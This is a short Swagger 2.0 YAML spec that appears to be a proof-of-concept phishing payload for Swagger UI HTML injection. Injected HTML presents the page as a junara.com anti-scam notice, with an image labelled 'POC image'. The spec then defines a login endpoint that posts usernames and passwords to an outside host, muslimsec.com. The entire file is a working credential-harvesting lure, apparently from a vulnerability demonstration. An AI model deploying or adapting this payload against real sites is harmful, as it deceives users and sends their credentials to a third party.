swagger: '2.0'
info:
  version: 1.0.0
  title: <center>JUNARA.COM</center>
  description: <center><img src="https://muslimsec.com/junara/junara.jpg" alt="POC image"><br><br><b>Hallo</b>,<br>Be careful of scams using the name junara.com.<br>please only sign in through the junara.com website.<br><b><i>Thank you</i></b></center>.
host: muslimsec.com
basePath: /junara/
paths:
 /Login_Page.php:
    post:
      summary: Login here to continue
      description: Please provide your credentials to log in.
      parameters:
        - name: username
          in: formData
          description: The username for login
          required: true
          type: string
        - name: password
          in: formData
          description: The password for login
          required: true
          type: string
      tags:
        - Click here to login
      responses:
        '200':
          description: Successfully logged in and authenticated.
        '400':
          description: Invalid credentials or missing parameters.
        '500':
          description: Internal server error.
